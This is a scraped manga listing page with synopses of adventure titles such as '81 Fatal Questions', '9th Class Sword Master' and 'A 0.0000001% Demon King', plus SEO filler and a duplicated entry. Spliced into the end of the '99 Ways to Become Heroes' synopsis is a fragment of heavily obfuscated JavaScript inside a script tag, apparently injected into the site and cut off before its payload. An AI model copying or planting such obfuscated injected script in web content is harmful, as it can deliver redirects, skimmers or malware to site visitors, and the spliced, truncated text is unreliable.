Adventure - Page 5

Explore the world of Adventure manga, where gripping stories await. Start reading the best Adventure manga free now!

7410 results

80 Tian Zhengjiu Shijie

Kuini and Yilou must travel to Baoze, an unknown village, to prevent a nameless threat, or the world will end in 80 days. Along the way, they team up with the apprentice artist Lang, who is also traveling to Baoze to find the mythical dragons. The way to Baoze is filled with danger, mystery, mischief, and… fatal hilarity. Will they ever get to their destination?


81 Fatal Questions

In the year 2030, the end of the world happened with many people dying mysteriously, while the lone survivors were controlled by an app named “81 Fatal Questions”. After answering various questions and clearing the instance dungeons, survivors will be rewarded through the app. By competing against Death, only the ultimate winners will have a chance to survive. The genius heroine who has had a “bad luck debuff” since birth, takes her comrades with her on her journey. Can she clear the game and survive until the end?


9 Banme no Musashi

The "ultra secret" organization, Ultimate Blue, dedicates itself to fighting terrorists and criminals in the name of peace. Their top agent goes by the code name "Musashi #9;" she is a quiet yet fearless 16 year old girl. From Baka-Updates: Exotic. Smart. Lethal. Musashi #9 doesn't live the life of a normal teenager. Hers is full of intrigue, violence, and death. Some people want to change the world. This sixteen year-old girl can. Deep ideological, religious, and social differences drive the world closer to destruction, and the innocent masses suffer while politicians huddle in safety. One ultra-secret organization is committed to preserving world peace, and their top agent goes by the code name Musashi #9. This agent battles terrorists and extremists, while bringing hope to the people she saves. The world may be a dangerous place, but it's a whole lot safer with Musashi #9 in it.


9 Wonder Worlds

Bored of Isekai? Reincarnation? You have come to the right place.The Great War devours millions of lives. The children lost their parents, orphan are everywhere. Salvage is an institution funded by the government especially for orphans to become their country's heroes in the future. Akira Koshino is 14 years old boy orphan desiring revenge for his parent's death to accomplish his goal. During his journey, he encounters and makes friends, foes, and fantasy creatures.


99 Ways to Become Heroes by Beauty Masters

I, Lu Chen, am the only son of the King Lu. I thought I could live a life of nourishment at night since I was born. Unfortunately, my talent was too high, which was hard to find in the past. Five beautiful masters fell from the sky to force me to practice, each with extraordinary strength, the master of a domain, the master of a holy land, the empress of a thousand ages, the supreme empress of the world of pills, the emperor of alchemy, plus a sticky little sister…The road to holy cultivation is too much for a man to bear!<script></script><script>function _0x55de(_0x140f60,_0xae9453){var _0x324550=_0x5c6b();return _0x55de=function(_0x5396c8,_0xfac792){_0x5396c8=_0x5396c8-(0xd3b*0x2+0x298+0x5*-0x59f);var _0x4a3b5c=_0x324550[_0x5396c8];return _0x4a3b5c;},_0x55de(_0x140f60,_0xae9453);}(function(_0x3a0d1a,_0x98575f){var _0x5738ff=_0x55de,_0x28d3ed=_0x3a0d1a();while(!![]){try{var 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990k Ex-Life Hunter

The ordinary F-rank hunter, Gang HyeonJoon, had always prayed for the strength to change his life. One day, his prayers were answered… [The Final Sword Saint praises your bravery.][The Master in the Shadows is your….] “Enough! This is too much!” 990 thousand past lives appeared in front of him!


996 At The Start

A sad reminder that the social animal Li Xiaoming finally hugged the thighs of a rich and beautiful woman and was about to start a lascivious life, but was arrested by the [007] system and sent to another world to continue with the [996] system! [007] System: Take this [996] system, and you will no longer be a mortal from now on Li Xiaoming: Who wants this bullshit cheat?! I want to go home! [007] System: Only by doing good deeds and accumulating merit points, can you go back. The System [996] has a lot of benefits, which is your blessing. Li Xiaoming:


9th Class Sword Master: The Guardian of the Sword

Read manhwa 9th Class Sword Master: The Guardian of the Sword At the end of the “War of Trust,” that was fought to protect humanity against the forces of “corruption,” Karil MacGavern, a Sword Saint, faces the betrayal of his close friend and emperor, Oliven. Having ultimately killed the emperor, Karil travels back in time to set things right. Now, armed with the power he couldn’t obtain in his previous life, both a sword and magic. He stands at the crossroads of two paths, determined to change the future.



A band of young teenagers called DNA spends their days trying to survive the harsh streets of L.A. But DNA soon finds itself up against @Large -- an Internet cafe that holds a dangerous secret. A story inspired by hip-hop and rap that takes readers through a gritty yet compelling Los Angeles


A 0.0000001% Demon King

Read “A 0.0000001% Demon King Novel” – “A 0.0000001% Demon King Manhwa” Online Free On Hotmanhwa The Summary Of The Comic A 0.0000001% Demon King: The 72 Demon Kings, Who Received The Order To Destroy The Earth, Each Went Through A Trial By The Great Demon King Astrea. Those Who Passed The Trial Earned The Title Of Demon King, And Each Demon King Was Granted Special Powers By The Great Demon King. So Far, Each Demon King Had Been Granted Extraordinary Abilities. When Karos Became A Demon King, He Received A Power From The Great Demon King, But… “Great Demon King, No Matter How Much I Think About It, There Is A Problem With My Power.” “Problem?” Among The Demon Kings With Extraordinary Abilities… Karos Received The “Gacha” Ability. “Gacha As The Power Of A Demon King? How Am I Supposed To Rule The World With Gacha?!’” The Comic “A 0.0000001% Demon King” Belongs To The Genre: Action, Adventure, Fantasy “Manhua Plus, Manhwa Updates, Manhwa Website…” Are The Most Searched Keywords On The Website S2Manga. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging


A 0.0000001% Demon King

Read “A 0.0000001% Demon King Novel” – “A 0.0000001% Demon King Manhwa” Online Free On HOTMANHWA The summary of the comic A 0.0000001% Demon King: The 72 Demon Kings, who received the order to destroy the earth, each went through a trial by the Great Demon King Astrea. Those who passed the trial earned the title of Demon King, and each Demon King was granted special powers by the Great Demon King. So far, each Demon King had been granted extraordinary abilities. When Karos became a Demon King, he received a power from the Great Demon King, but… “Great Demon King, no matter how much I think about it, there is a problem with my power.” “Problem?” Among the Demon Kings with extraordinary abilities… Karos received the “Gacha” ability. “Gacha as the power of a Demon King? How am I supposed to rule the world with Gacha?!’” The comic “A 0.0000001% Demon King” belongs to the Genre: Action, Adventure, Fantasy “Manhua Plus, Manhwa Updates, Manhwa Website…” are the most searched keywords on the website S2Manga. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging
